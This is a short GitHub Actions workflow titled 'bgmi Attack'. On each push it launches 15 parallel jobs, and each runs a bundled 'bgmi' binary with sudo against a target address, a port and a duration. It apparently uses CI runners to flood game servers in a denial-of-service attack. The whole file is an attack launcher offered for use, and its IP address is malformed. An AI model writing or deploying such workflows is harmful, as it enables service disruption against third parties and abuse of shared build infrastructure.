name: bgmi Attack
on: [push]

jobs:
  bgmi:
    runs-on: ubuntu-22.04
    strategy:
      matrix:
        n: [1,2,3,4,5,6,7,8,9,10,
            11,12,13,14,15]
    steps:
    - uses: actions/checkout@v3
    - run: chmod +x bgmi
    - run: sudo ./bgmi 20.193.919 90144 300
